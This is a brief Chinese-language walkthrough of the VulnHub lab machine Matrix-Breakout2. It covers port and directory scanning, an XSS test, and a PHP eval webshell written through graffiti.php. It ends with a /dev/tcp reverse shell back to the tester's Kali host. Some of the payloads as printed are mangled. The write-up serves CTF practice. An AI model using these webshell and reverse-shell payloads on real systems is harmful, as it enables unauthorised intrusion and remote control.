vulnhub系列靶机-Matrix-Breakout2

下载地址:https://www.vulnhub.com/entry/matrix-breakout-2-morpheus,757/

基础信息收集

nmap 192.168.113.143

dirsearch -u '192.168.113.143' -i 200

只扫到一个这个

去看看:

192.168.113.143

192.168.113.143:81

现在还不知道账号密码

192.168.113.143/robots.txt

坐到这里我就卡住了,不知道怎么继续了,查了攻略才知道,是字典不够,看人家的:

gobuster dir -u http://192.168.113.143 -x php,txt,jsp,asp -w /usr/share/wordlists/dirb/common.txt

还有这个http://192.168.113.143/graffiti.php

主攻graffiti.php

http://192.168.113.143/graffiti.php

可以从多方面入手

xss

<script>alert(1)</script>

成功

那可以直接传一句话木马

<?php phpinfo();@eval($_POSTcmd);?>

为什么还是弹窗

下载看看后面的graffiti.txt

原来是没有被解析

抓包看看

直接就成功了

上蚁剑

反弹shell上线kali

nc -lvvp 8888

echo >& /dev/tcp/192.168.113.138/8888 0>&1

结束

相关推荐
三84411 小时前
PHP Session 反序列化(2):漏洞根因 —— 序列化处理器错位与对象注入
android·web安全·php·反序列化·session
Bruce_Liuxiaowei16 小时前
从两个中危漏洞读懂 CVSS 评分体系:向量拆解、数学计算与实战观察
安全·网络安全·漏洞评级
我的小卷呀18 小时前
Linux ip 命令底层逻辑与实战指南
linux·运维·c语言·网络协议·tcp/ip·网络安全
祁白_18 小时前
防御引擎绕过方法
笔记·web安全·php·防御引擎
一只鹿鹿鹿20 小时前
信息网络安全建设方案(PPT文件)
大数据·安全·web安全·系统安全·制造
泛联新安21 小时前
“天神”空降:泛联新安受邀参加第八届“纵横”网络空间创新论坛
网络安全·自动化·代码规范·漏洞挖掘·代码安全·代码漏洞扫描·ai+可信开发
sbjdhjd1 天前
在 8 字符、字母数字过滤与 PHP 版本差异下复盘临时文件命令执行链 | (8字符绕过)
android·java·开发语言·安全·web安全·数据挖掘·php
小杨不想秃头1 天前
信息安全工程师第六章
网络·安全·web安全
HackTwoHub1 天前
AI自动化信息收集赋能渗透测试!集成多款主流扫描工具,多维智能评分,精准锁定高危资产
运维·人工智能·安全·web安全·网络安全·自动化·系统安全
数安旭说1 天前
私接外网、资产篡改、挖矿木马:终端异常告警体系建设思路
网络安全·企业安全·零信任·内网安全·终端安全·dlp·安全审计